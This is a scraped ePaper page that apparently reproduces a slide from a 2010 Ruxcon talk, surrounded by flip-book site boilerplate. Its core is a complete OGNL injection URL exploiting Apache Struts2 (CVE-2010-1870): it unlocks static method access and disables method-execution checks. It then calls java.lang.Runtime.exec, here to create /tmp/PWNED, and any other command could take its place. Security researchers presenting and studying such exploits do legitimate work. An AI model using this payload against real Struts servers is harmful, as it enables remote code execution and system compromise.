13.07.2015 Views

view.getClass().forName('java.lang.Runtime'). - 2010 - Ruxcon

view.getClass().forName('java.lang.Runtime'). - 2010 - Ruxcon

view.getClass().forName('java.lang.Runtime'). - 2010 - Ruxcon

SHOW MORE
SHOW LESS
  • No tags were found...

Create successful ePaper yourself

Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.

CVE-<strong>2010</strong>-1870 exploit/HelloWorld.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.<strong>lang</strong>.Boolean("false")))&(ssss)((\u0023rt\u003d@java.<strong>lang</strong>.Runtime@getRuntime())(\u0023rt.exec('mkdir\u0020/tmp/PWNED'\u002cnull)))=1Thursday, November 25, <strong>2010</strong>

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!